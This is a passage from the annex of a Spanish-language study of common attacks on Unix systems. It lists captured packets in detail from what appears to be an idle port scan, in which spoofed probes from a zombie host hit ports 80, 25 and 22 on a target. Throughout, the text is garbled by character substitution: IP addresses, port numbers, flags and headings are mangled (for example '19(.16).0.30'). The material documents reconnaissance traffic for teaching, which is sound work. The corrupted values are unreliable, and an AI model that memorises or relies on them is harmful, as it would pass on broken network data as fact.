-> 8P De tino: 19(.16).0.(:357(5 Proto!o"o: T,P De !rip!i%n: (0 > 357(5 -$.T4 #,50 .eq10 #!610 &in10 2en10

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J- de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: ) - Tiempo: 1.151695 8P Origen: 19(.16).0.(:357(6 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 357(6 > (( -B8N4 P.?4 K$H0 .eq10 Krg10 2en10

B.2.0. Ca"tura 0 a **% 7dle ,can


Paquete nro. 1 - Tiempo 0.000000 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: ** -> ** 8P ?ea7er: =er ion:** 2en:** 8D:** Brag:** TT2:** 9...: T,P ?ea7er: .Port:** DPort:** .eqN:** #!6N:** B"ag :0D**9**: &n7:** 9...: De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.100 aE 19(.16).0.( Paquete nro. ( - Tiempo 0.00()90 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: ** -> ** 8P ?ea7er: =er ion:** 2en:** 8D:** Brag:** TT2:** 9...: T,P ?ea7er: .Port:** DPort:** .eqN:** #!6N:** B"ag :0D**9**: &n7:** 9...: De !rip!ion: <t'er ; #$P i at 00:0!:(9:90:(a:(7 aE 19(.16).0.100 Paquete nro. 3 - Tiempo 0.0(9939 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:7))( Brag:02 TT2:37 9...: T,P ?ea7er: .Port:+617+ DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617+ > 19(.16).0.30:>>> .# Paquete nro. + - Tiempo 0.03193( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)1 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+617+ .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617+ $ Paquete nro. 5 - Tiempo 0.065571 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3))03 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6175 DPort:)0 .eqN:13(0+0++( #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6175 > 19(.16).0.30:>>> .# Paquete nro. 6 - Tiempo 0.065)0+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)( Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6175 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6175 $ Paquete nro. 7 - Tiempo 0.097500 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(0931 Brag:02 TT2:+3 9...: T,P ?ea7er: .Port:+6176 DPort:)0 .eqN:13(0+0++3 #!6N:(303113(51 B"ag :0D1(9.#: &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6176 > 19(.16).0.30:>>> .# Paquete nro. ) - Tiempo 0.0977+) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)3 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6176 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6176 $ Paquete nro. 9 - Tiempo 0.1(9+9( 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3)11) Brag:02 TT2:56 9...:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J1 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


T,P ?ea7er: .Port:+6177 DPort:)0 .eqN:13(0+0+++ #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6177 > 19(.16).0.30:>>> .# Paquete nro. 10 - Tiempo 0.1(9905 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)+ Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6177 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6177 $ Paquete nro. 11 - Tiempo 0.161565 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3(+51 Brag:02 TT2:+6 9...: T,P ?ea7er: .Port:+617) DPort:)0 .eqN:13(0+0++5 #!6N:(303113(51 B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617) > 19(.16).0.30:>>> .# Paquete nro. 1( - Tiempo 0.16195) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)5 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+617) .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617) $ Paquete nro. 13 - Tiempo 0.193+66 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:59060 Brag:02 TT2:+1 9...: T,P ?ea7er: .Port:+6179 DPort:)0 .eqN:13(0+0++6 #!6N:(303113(51 B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6179 > 19(.16).0.30:>>> .# Paquete nro. 1+ - Tiempo 0.19+(95 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:)6 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6179 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6179 $ Paquete nro. 15 - Tiempo 0.19++50 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:1+395 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 16 - Tiempo 0.19+6(0 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. 17 - Tiempo 0.19+6(7 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. 1) - Tiempo 0.(+5560 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:+7)16 Brag:02 TT2:50 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++( #!6N:(303113(51 B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 19 - Tiempo 0.(+607( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J5 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)) Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (0 - Tiempo 0.(+60)0 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)) Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (1 - Tiempo 0.(97577 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:6(317 Brag:02 TT2:5+ 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++3 #!6N:(303113(51 B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. (( - Tiempo 0.(97757 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (3 - Tiempo 0.(9776+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:)9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (+ - Tiempo 0.3+966( 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:37))+ Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0+++ #!6N:(303113(51 B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. (5 - Tiempo 0.3+9)59 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:90 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (6 - Tiempo 0.3+9)66 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:90 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ Paquete nro. (7 - Tiempo 0.653+67 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:+6(96 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6330 DPort:)0 .eqN:()70071(9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6330 > 19(.16).0.30:>>> .# Paquete nro. () - Tiempo 0.653739 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:91 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6330 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6330 $ Paquete nro. (9 - Tiempo 0.653)51 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *JJ de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:335(0 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. 30 - Tiempo 0.65+0+9 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. 31 - Tiempo 0.65+055 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. 3( - Tiempo 0.65+33+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:9( Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. 33 - Tiempo 0.65+3+1 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:9( Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. 3+ - Tiempo 0.705565 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:15757 Brag:02 TT2:59 9...: T,P ?ea7er: .Port:+6(+) DPort:)0 .eqN:()7007179( #!6N:397)13361+ B"ag :0D1(9.#: &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(+) > 19(.16).0.30:>>> .# Paquete nro. 35 - Tiempo 0.705)51 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:93 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(+) .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(+) $ Paquete nro. 36 - Tiempo 0.7059+) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:15305 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:)0 DPort:(( .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 37 - Tiempo 0.7060)7 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 3) - Tiempo 0.706093 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 39 - Tiempo 0.757+75 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J+ de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:13500 Brag:02 TT2:56 9...: T,P ?ea7er: .Port:+6376 DPort:)0 .eqN:()7007((9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6376 > 19(.16).0.30:>>> .# Paquete nro. +0 - Tiempo 0.757751 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:9+ Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6376 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6376 $ Paquete nro. +1 - Tiempo 0.7)1+31 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:1+56) Brag:02 TT2:+( 9...: T,P ?ea7er: .Port:+6391 DPort:)0 .eqN:()7007(79( #!6N:397)13361+ B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6391 > 19(.16).0.30:>>> .# Paquete nro. +( - Tiempo 0.7)1696 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:95 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6391 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6391 $ Paquete nro. +3 - Tiempo 0.7)1)0( 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:606+ Brag:02 TT2:+( 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. ++ - Tiempo 0.7)1935 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(16016+(03 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. +5 - Tiempo 0.7)19+0 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(7 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:(5 DPort:)0 .eqN:(16016+(03 #!6N:(300791639 B"ag :0D1(9.#: &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# Paquete nro. +6 - Tiempo 0.7)(1+6 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:96 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. +7 - Tiempo 0.7)(15( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 8D:96 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:(5 .eqN:(300791639 #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ Paquete nro. +) - Tiempo 0.)33+53 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(315( Brag:02 TT2:+( 9...: T,P ?ea7er: .Port:+6176 DPort:)0 .eqN:()70073(9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6176 > 19(.16).0.30:>>> .#

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *JO de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete nro. +9 - Tiempo 0.)33790 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:97 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6176 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6176 $ Paquete nro. 50 - Tiempo 0.)33)9) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:+(507 Brag:02 TT2:50 9...: T,P ?ea7er: .Port:)0 DPort:(( .eqN:(30079163) #!6N:0 B"ag :0D0(9.: &n7:307( 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 51 - Tiempo 0.)3+100 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:() Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 5( - Tiempo 0.)3+106 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:() Brag:02 TT2:(55 9...: T,P ?ea7er: .Port:(( DPort:)0 .eqN:0 #!6N:(300791639 B"ag :0D1+9$#: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# Paquete nro. 53 - Tiempo 0.))5+57 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:61533 Brag:02 TT2:+1 9...: T,P ?ea7er: .Port:+6(66 DPort:)0 .eqN:()7007379( #!6N:397)13361+ B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(66 > 19(.16).0.30:>>> .# Paquete nro. 5+ - Tiempo 0.))56)+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:9) Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(66 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(66 $ Paquete nro. 55 - Tiempo 0.9(55(1 3a! Origen: 00:17:31:96:5b:1f -> 